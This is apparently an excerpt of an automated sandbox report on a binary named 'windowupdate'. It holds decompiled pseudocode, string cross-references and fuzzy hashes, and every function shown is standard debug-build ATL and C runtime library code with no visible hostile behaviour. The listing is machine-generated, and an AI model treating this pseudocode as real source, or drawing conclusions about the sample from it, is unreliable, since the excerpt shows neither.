                      Strings
                      • %ls, xrefs: 00D3F7CF
                      • pUnkOuter == 0, xrefs: 00D3F7CA
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h, xrefs: 00D3F7DB
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h$pUnkOuter == 0
                      • API String ID: 930174750-63398507
                      • Opcode ID: 19481e6d25efb85db4a14461c1ba61f81d58391ba97ca1326faec8e893850720
                      • Instruction ID: af9b452accbed71888b927163366ab6cabca7d48c2ae17ebd56a20cdffe53547
                      • Opcode Fuzzy Hash: 19481e6d25efb85db4a14461c1ba61f81d58391ba97ca1326faec8e893850720
                      • Instruction Fuzzy Hash: D9513CB1E0021DAFCB04DF59D881BAE77B1EF48354F148529E809AB291D7759D81CFB4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 64%
                      			E00D36E40(void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				char _v20;
                      				intOrPtr* _v28;
                      				char _v36;
                      				intOrPtr* _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				void _v56;
                      				intOrPtr _t49;
                      				intOrPtr _t54;
                      				intOrPtr _t55;
                      				void* _t57;
                      				intOrPtr _t59;
                      				void* _t63;
                      				void* _t67;
                      				void* _t68;
                      				intOrPtr _t72;
                      				intOrPtr _t82;
                      				intOrPtr* _t83;
                      				void* _t93;
                      				void* _t94;
                      				void* _t95;
                      
                      				_t83 = __edx;
                      				_push(__ecx);
                      				memset( &_v56, 0xcccccccc, 0xd << 2);
                      				_t95 = _t94 + 0xc;
                      				_pop(_t72);
                      				_v8 = _t72;
                      				do {
                      					if(_a4 < 0) {
                      						_v52 = 0;
                      					} else {
                      						_v52 = 1;
                      					}
                      					_v12 = _v52;
                      					_t98 = _v12;
                      					if(_v12 == 0) {
                      						_t68 = L00D84930(_t98, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x45, 0, "%ls", L"__atl_condVal");
                      						_t95 = _t95 + 0x18;
                      						if(_t68 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					if(_v12 == 0) {
                      						_t55 = 0;
                      						L28:
                      						_push(_t83);
                      						E00DC14C0(_t93, 0xd36fe4);
                      						_t57 = _t55;
                      						return E00DC1520(_t57, _t93 - _t95 + 0x34);
                      					}
                      					_t83 = 0;
                      					__eflags = 0;
                      				} while (0 != 0);
                      				_t49 = E00D41ED0( &_a4,  &_a4, _a4, 1);
                      				_t95 = _t95 + 0xc;
                      				__eflags = _t49;
                      				if(_t49 >= 0) {
                      					_t83 = _a4;
                      					_v44 = E00D41F10(_t83, 8);
                      					while(1) {
                      						__eflags = _a4 - _v44;
                      						if(_a4 > _v44) {
                      							_v56 = 0;
                      						} else {
                      							_v56 = 1;
                      						}
                      						_v48 = _v56;
                      						__eflags = _v48;
                      						if(__eflags == 0) {
                      							_t67 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x51, 0, "%ls", L"__atl_condVal");
                      							_t95 = _t95 + 0x18;
                      							__eflags = _t67 - 1;
                      							if(_t67 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v48;
                      						if(_v48 == 0) {
                      							break;
                      						}
                      						__eflags = 0;
                      						if(0 != 0) {
                      							continue;
                      						}
                      						_t83 = _v44;
                      						_t54 = E00D31800(_a8,  &_v36, _t83, _a8);
                      						_t95 = _t95 + 0xc;
                      						__eflags = _t54;
                      						if(_t54 < 0) {
                      							L24:
                      							_t55 = 0;
                      							goto L28;
                      						}
                      						_t83 =  &_v20;
                      						_t59 = E00D41C60(_t54, _v36, _t83, 0x10, _v36);
                      						_t95 = _t95 + 0xc;
                      						__eflags = _t59;
                      						if(_t59 >= 0) {
                      							_t83 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 4))));
                      							_t63 =  *((intOrPtr*)( *_t83))(_v20);
                      							__eflags = _t95 - _t95;
                      							_v28 = E00DC1520(_t63, _t95 - _t95);
                      							__eflags = _v28;
                      							if(_v28 != 0) {
                      								 *_v28 = _v8;
                      								 *((intOrPtr*)(_v28 + 0xc)) = 1;
                      								_t82 = _v44 - 1;
                      								__eflags = _t82;
                      								_t83 = _v28;
                      								 *((intOrPtr*)(_t83 + 8)) = _t82;
                      								 *((intOrPtr*)(_v28 + 4)) = 0;
                      								_t55 = _v28;
                      							} else {
                      								_t55 = 0;
                      							}
                      							goto L28;
                      						}
                      						goto L24;
                      					}
                      					_t55 = 0;
                      					goto L28;
                      				}
                      				_t55 = 0;
                      				goto L28;
                      			}



























                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D36FC8
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlstr.h$__atl_condVal
                      • API String ID: 930174750-415448663
                      • Opcode ID: 30c008257a616fcf54973c6036ac5c06c230f210a12e036660e2fe74b868a9c5
                      • Instruction ID: c0f82d273edd8407016ee12e21768dbefd2d688b1060b76e53665e0949d200f3
                      • Opcode Fuzzy Hash: 30c008257a616fcf54973c6036ac5c06c230f210a12e036660e2fe74b868a9c5
                      • Instruction Fuzzy Hash: 2F516079E10209BFDB14DF94D886BEEBBB4EF48744F14C518FA05A7281D671D9888BB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E00DAC9F0(char _a4, char _a8) {
                      				signed int _v8;
                      				intOrPtr _v12;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _t55;
                      				void* _t59;
                      				intOrPtr* _t61;
                      				void* _t62;
                      				intOrPtr* _t63;
                      				void* _t65;
                      				void* _t67;
                      				void* _t82;
                      				signed int _t106;
                      				void* _t119;
                      				void* _t120;
                      
                      				_t55 = E00D98780(E00D6C080( &_a8));
                      				_t120 = _t119 + 4;
                      				_v8 = _t55;
                      				if((E00DACD50( &_a8) & 0x000000ff) == 0) {
                      					_t59 = E00DB46A0(_v8, _v8,  &_a4, 1);
                      					__eflags = _t59 - 1;
                      					if(_t59 != 1) {
                      						_v28 = 0;
                      					} else {
                      						_v28 = 1;
                      					}
                      					return _v28;
                      				}
                      				_t61 = E00D67320( &_a8);
                      				_t62 = E00D67320( &_a8);
                      				_t125 =  *_t61 -  *((intOrPtr*)(_t62 + 4));
                      				if( *_t61 -  *((intOrPtr*)(_t62 + 4)) < 0) {
                      					_t82 = L00D84930(_t125, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_flsbuf.cpp", 0x41, 0, L"%ls", L"(\"inconsistent IOB fields\", stream->_ptr - stream->_base >= 0)");
                      					_t120 = _t120 + 0x18;
                      					if(_t82 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_t63 = E00D67320( &_a8);
                      				_v12 =  *_t63 -  *((intOrPtr*)(E00D67320( &_a8) + 4));
                      				_t65 = E00D67320( &_a8);
                      				 *((intOrPtr*)(E00D67320( &_a8))) =  *((intOrPtr*)(_t65 + 4)) + 1;
                      				_t67 = E00D67320( &_a8);
                      				 *((intOrPtr*)(E00D67320( &_a8) + 8)) =  *((intOrPtr*)(_t67 + 0x18)) - 1;
                      				_v20 = 0;
                      				if(_v12 <= 0) {
                      					__eflags = _v8 - 0xffffffff;
                      					if(_v8 == 0xffffffff) {
                      						L9:
                      						_v16 = 0xdf61f0;
                      						L10:
                      						_t106 = _v16;
                      						_t34 = _t106 + 0x28; // 0xa0a0080
                      						__eflags =  *_t34 & 0x20;
                      						if(( *_t34 & 0x20) == 0) {
                      							goto L13;
                      						}
                      						_v36 = E00DB54F0(_v8, 0, 0, 2);
                      						_v32 = _t106;
                      						__eflags = (_v36 & _v32) - 0xffffffff;
                      						if((_v36 & _v32) != 0xffffffff) {
                      							goto L13;
                      						}
                      						E00D99080( &_a8, 0x10);
                      						return 1;
                      					}
                      					__eflags = _v8 - 0xfffffffe;
                      					if(_v8 == 0xfffffffe) {
                      						goto L9;
                      					}
                      					_v16 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xf21198 + (_v8 >> 6) * 4));
                      					goto L10;
                      				} else {
                      					_v20 = E00DB46A0(_v8, _v8,  *((intOrPtr*)(E00D67320( &_a8) + 4)), _v12);
                      					L13:
                      					 *((char*)( *((intOrPtr*)(E00D67320( &_a8) + 4)))) = _a4;
                      					if(_v20 != _v12) {
                      						_v24 = 0;
                      					} else {
                      						_v24 = 1;
                      					}
                      					return _v24;
                      				}
                      			}























                      APIs
                        • Part of subcall function 00D98780: std::_Timevec::_Timevec.LIBCPMTD ref: 00D9878F
                      • __wcstombs_l.LIBCMTD ref: 00DACB19
                      Strings
                      • ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0), xrefs: 00DACA39
                      • minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp, xrefs: 00DACA47
                      • %ls, xrefs: 00DACA3E
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___wcstombs_lstd::_
                      • String ID: %ls$("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp
                      • API String ID: 2681442900-3128027998
                      • Opcode ID: ced3bb52243b4844ecea2724df687915b82c596532646e352061debefdf3c3a1
                      • Instruction ID: d3af19f54273e2dcc733576c8fcf83b95ac6df093e84c61bec22fdbfd31d1641
                      • Opcode Fuzzy Hash: ced3bb52243b4844ecea2724df687915b82c596532646e352061debefdf3c3a1
                      • Instruction Fuzzy Hash: 3A51A271D14108AFCB14EF64D966BEE7770EF01324F249259E8266B292D731EA44DBF0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E00DACBA0(void* _a4, char _a8) {
                      				signed int _v8;
                      				intOrPtr _v12;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _t55;
                      				void* _t59;
                      				intOrPtr* _t61;
                      				void* _t62;
                      				intOrPtr* _t63;
                      				void* _t65;
                      				void* _t67;
                      				void* _t82;
                      				signed int _t106;
                      				void* _t119;
                      				void* _t120;
                      
                      				_t55 = E00D98780(E00D6C080( &_a8));
                      				_t120 = _t119 + 4;
                      				_v8 = _t55;
                      				if((E00DACD50( &_a8) & 0x000000ff) == 0) {
                      					_t59 = E00DB46A0(_v8, _v8,  &_a4, 2);
                      					__eflags = _t59 - 2;
                      					if(_t59 != 2) {
                      						_v28 = 0;
                      					} else {
                      						_v28 = 1;
                      					}
                      					return _v28;
                      				}
                      				_t61 = E00D67320( &_a8);
                      				_t62 = E00D67320( &_a8);
                      				_t125 =  *_t61 -  *((intOrPtr*)(_t62 + 4));
                      				if( *_t61 -  *((intOrPtr*)(_t62 + 4)) < 0) {
                      					_t82 = L00D84930(_t125, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_flsbuf.cpp", 0x41, 0, L"%ls", L"(\"inconsistent IOB fields\", stream->_ptr - stream->_base >= 0)");
                      					_t120 = _t120 + 0x18;
                      					if(_t82 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_t63 = E00D67320( &_a8);
                      				_v12 =  *_t63 -  *((intOrPtr*)(E00D67320( &_a8) + 4));
                      				_t65 = E00D67320( &_a8);
                      				 *((intOrPtr*)(E00D67320( &_a8))) =  *((intOrPtr*)(_t65 + 4)) + 2;
                      				_t67 = E00D67320( &_a8);
                      				 *((intOrPtr*)(E00D67320( &_a8) + 8)) =  *((intOrPtr*)(_t67 + 0x18)) - 2;
                      				_v20 = 0;
                      				if(_v12 <= 0) {
                      					__eflags = _v8 - 0xffffffff;
                      					if(_v8 == 0xffffffff) {
                      						L9:
                      						_v16 = 0xdf61f0;
                      						L10:
                      						_t106 = _v16;
                      						_t34 = _t106 + 0x28; // 0xa0a0080
                      						__eflags =  *_t34 & 0x20;
                      						if(( *_t34 & 0x20) == 0) {
                      							goto L13;
                      						}
                      						_v36 = E00DB54F0(_v8, 0, 0, 2);
                      						_v32 = _t106;
                      						__eflags = (_v36 & _v32) - 0xffffffff;
                      						if((_v36 & _v32) != 0xffffffff) {
                      							goto L13;
                      						}
                      						E00D99080( &_a8, 0x10);
                      						return 1;
                      					}
                      					__eflags = _v8 - 0xfffffffe;
                      					if(_v8 == 0xfffffffe) {
                      						goto L9;
                      					}
                      					_v16 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xf21198 + (_v8 >> 6) * 4));
                      					goto L10;
                      				} else {
                      					_v20 = E00DB46A0(_v8, _v8,  *((intOrPtr*)(E00D67320( &_a8) + 4)), _v12);
                      					L13:
                      					 *((short*)( *((intOrPtr*)(E00D67320( &_a8) + 4)))) = _a4;
                      					if(_v20 != _v12) {
                      						_v24 = 0;
                      					} else {
                      						_v24 = 1;
                      					}
                      					return _v24;
                      				}
                      			}























                      APIs
                        • Part of subcall function 00D98780: std::_Timevec::_Timevec.LIBCPMTD ref: 00D9878F
                      • __wcstombs_l.LIBCMTD ref: 00DACCC9
                      Strings
                      • ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0), xrefs: 00DACBE9
                      • minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp, xrefs: 00DACBF7
                      • %ls, xrefs: 00DACBEE
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___wcstombs_lstd::_
                      • String ID: %ls$("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp
                      • API String ID: 2681442900-3128027998
                      • Opcode ID: 6ade0c04775bd34bef4dbf8b729af4258f011f96f3b071edb40961c0e7bbc2b4
                      • Instruction ID: cd7c50d76abe3804e805e1522ccf1c5e8921403ec905b186c696ed5381626fef
                      • Opcode Fuzzy Hash: 6ade0c04775bd34bef4dbf8b729af4258f011f96f3b071edb40961c0e7bbc2b4
                      • Instruction Fuzzy Hash: 3151C471D10108EBCF14EF64D956BEE7B70EF01324F249259E82A6B291DB30AA44DBF0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 72%
                      			E00D3E0B0(void* __ebx, signed int* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                      				signed int* _v8;
                      				signed int* _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _t56;
                      				signed int _t57;
                      				void* _t60;
                      				signed int _t64;
                      				void* _t69;
                      				signed int _t89;
                      				void* _t92;
                      				void* _t93;
                      				void* _t94;
                      				void* _t95;
                      
                      				_t93 = __esi;
                      				_t92 = __edi;
                      				_t69 = __ebx;
                      				_v28 = 0xcccccccc;
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				if(_v8[1] != _v8[2]) {
                      					L22:
                      					E00D3FD00(_v8, _v8[1], _a4);
                      					_t56 = _v8[1] + 1;
                      					__eflags = _t56;
                      					_v8[1] = _t56;
                      					_t57 = 1;
                      					L23:
                      					return E00DC1520(_t57, _t94 - _t95 + 0x18);
                      				} else {
                      					goto L1;
                      				}
                      				do {
                      					L1:
                      					if(_a4 <  *_v8 || _a4 >=  *_v8 + _v8[2]) {
                      						_v24 = 1;
                      					} else {
                      						_v24 = 0;
                      					}
                      					_v12 = _v24;
                      					do {
                      						_t100 = _v12;
                      						if(_v12 == 0) {
                      							_t60 = L00D84930(_t100, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlsimpcoll.h", 0xac, 0, "%ls", L"__atl_condVal");
                      							_t95 = _t95 + 0x18;
                      							if(_t60 == 1) {
                      								asm("int3");
                      							}
                      						}
                      					} while (0 != 0);
                      					_t103 = _v12;
                      					if(_v12 == 0) {
                      						E00D32500(_t69, _t92, _t93, _t103, 0x80004005);
                      					}
                      				} while (0 != 0);
                      				if(_v8[2] != 0) {
                      					_t89 = _v8[1] << 1;
                      					__eflags = _t89;
                      					_v28 = _t89;
                      				} else {
                      					_v28 = 1;
                      				}
                      				_v20 = _v28;
                      				if(_v20 < 0 || _v20 > 0x7fffffff) {
                      					_t57 = 0;
                      				} else {
                      					_t64 = E00D82210( *_v8, _v20, 1);
                      					_t95 = _t95 + 0xc;
                      					_v16 = _t64;
                      					__eflags = _v16;
                      					if(__eflags != 0) {
                      						_v8[2] = _v20;
                      						 *_v8 = _v16;
                      						goto L22;
                      					}
                      					_t57 = 0;
                      				}
                      			}




















                      APIs
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlsimpcoll.h, xrefs: 00D3E129
                      • __atl_condVal, xrefs: 00D3E118
                      • %ls, xrefs: 00D3E11D
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: __wdupenv_s
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlsimpcoll.h$__atl_condVal
                      • API String ID: 2478291497-1071720693
                      • Opcode ID: 39b9baf92ca48d838b5bf22477e793726d1579ba25fbea463bed9a8b0592b7e9
                      • Instruction ID: 00deb993781d9be5bbb57c88d3790e328c1ee5042712419e28a558fd97892d22
                      • Opcode Fuzzy Hash: 39b9baf92ca48d838b5bf22477e793726d1579ba25fbea463bed9a8b0592b7e9
                      • Instruction Fuzzy Hash: B141E774E00209EFCB14DF98C985BADB7B1FB48304F2481A9E515A73C5D771AE80DBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 75%
                      			E00D37E70(void* __ecx, intOrPtr* __edx, void* __edi, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				char _v20;
                      				signed int _v32;
                      				char _v44;
                      				signed int _v52;
                      				void* _t32;
                      				intOrPtr _t33;
                      				void* _t35;
                      				void* _t45;
                      				void* _t46;
                      				intOrPtr _t50;
                      				intOrPtr* _t61;
                      				void* _t67;
                      				void* _t68;
                      				void* _t69;
                      				void* _t70;
                      				void* _t71;
                      				void* _t72;
                      
                      				_t61 = __edx;
                      				_push(__ecx);
                      				_t67 =  &_v52;
                      				memset(_t67, 0xcccccccc, 0xc << 2);
                      				_t72 = _t71 + 0xc;
                      				_t68 = _t67 + 0xc;
                      				_pop(_t50);
                      				_v8 = _t50;
                      				if(_a4 == 0) {
                      					L2:
                      					_t32 = L00D84930(_t75, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x115, 0, "%ls", L"pOps != 0 && rgStrings != 0");
                      					_t72 = _t72 + 0x18;
                      					if(_t32 == 1) {
                      						asm("int3");
                      					}
                      					L4:
                      					if(_a4 == 0 || _a8 == 0) {
                      						_t33 = 0x80070057;
                      						L17:
                      						_push(_t61);
                      						E00DC14C0(_t70, 0xd37fa4);
                      						_t35 = _t33;
                      						return E00DC1520(_t35, _t70 - _t72 + 0x30);
                      					} else {
                      						_v12 = 0;
                      						while(1) {
                      							__eflags = _v12;
                      							if(_v12 < 0) {
                      								break;
                      							}
                      							__eflags =  *_a4;
                      							if( *_a4 == 0) {
                      								break;
                      							}
                      							_t61 = _a4;
                      							E00D3A0F0(_v8,  *_t61,  &_v20,  &_v32,  &_v44);
                      							__eflags = _v20 - 7;
                      							if(_v20 == 7) {
                      								_v52 = _v32 | 0x80000000;
                      								_a4 = _a4 + 4;
                      								_t61 = _a8;
                      								_v12 = E00D386D0(_t46, _v8, _t68, _t69, _v52,  &_a4, _t61, _a12, _a16, _a20);
                      								continue;
                      							}
                      							__eflags = 0;
                      							if(0 == 0) {
                      								_t45 = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x122, 0, "%ls", 0xde40dc);
                      								_t72 = _t72 + 0x18;
                      								__eflags = _t45 - 1;
                      								if(_t45 == 1) {
                      									asm("int3");
                      								}
                      							}
                      							_t33 = 0x80004005;
                      							goto L17;
                      						}
                      						_t33 = _v12;
                      						goto L17;
                      					}
                      				}
                      				_t75 = _a8;
                      				if(_a8 != 0) {
                      					goto L4;
                      				}
                      				goto L2;
                      			}























                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D37F8A
                      Strings
                      • %ls, xrefs: 00D37E9C, 00D37F19
                      • pOps != 0 && rgStrings != 0, xrefs: 00D37E97
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 00D37EA8, 00D37F25
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$pOps != 0 && rgStrings != 0
                      • API String ID: 930174750-939455025
                      • Opcode ID: d7feb16b21a5e333f186db67754e0e5a0170617bc10e1848591cf0a60bb8be82
                      • Instruction ID: cc73325e9d3fb51f94f41ea6117f94284f7ee2165ba2bed37a2a068a9488fc23
                      • Opcode Fuzzy Hash: d7feb16b21a5e333f186db67754e0e5a0170617bc10e1848591cf0a60bb8be82
                      • Instruction Fuzzy Hash: 1A318FB1A08609BFDB24EF88DC56FEE77B4AF44704F148159F509AA281D7709A84CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E00D31900(void* __eflags, intOrPtr _a4) {
                      				char _v8;
                      				signed int _v12;
                      				char _v20;
                      				intOrPtr _v28;
                      				signed int _v32;
                      				char _v37;
                      				char _v52;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				char _v76;
                      				intOrPtr _v84;
                      				char _v88;
                      				void _v92;
                      				void* _v108;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t38;
                      				signed int _t39;
                      				intOrPtr _t42;
                      				void* _t49;
                      				void* _t52;
                      				void* _t53;
                      				intOrPtr _t66;
                      				void* _t68;
                      				void* _t72;
                      				void* _t74;
                      				signed int _t75;
                      				void* _t76;
                      				intOrPtr _t78;
                      				char _t79;
                      
                      				_push(0xfffffffe);
                      				_push(0xdf2e58);
                      				_push(E00D49CD0);
                      				_push( *[fs:0x0]);
                      				_push(_t52);
                      				memset( &_v92, 0xcccccccc, 0x10 << 2);
                      				_t78 = _t76 + 0xffffffffffffffc4;
                      				_t38 =  *0xdf600c; // 0x71e60372
                      				_v12 = _v12 ^ _t38;
                      				_t39 = _t38 ^ _t75;
                      				_v32 = _t39;
                      				_push(_t39);
                      				 *[fs:0x0] =  &_v20;
                      				_v28 = _t78;
                      				_v76 = 0;
                      				_v37 = 1;
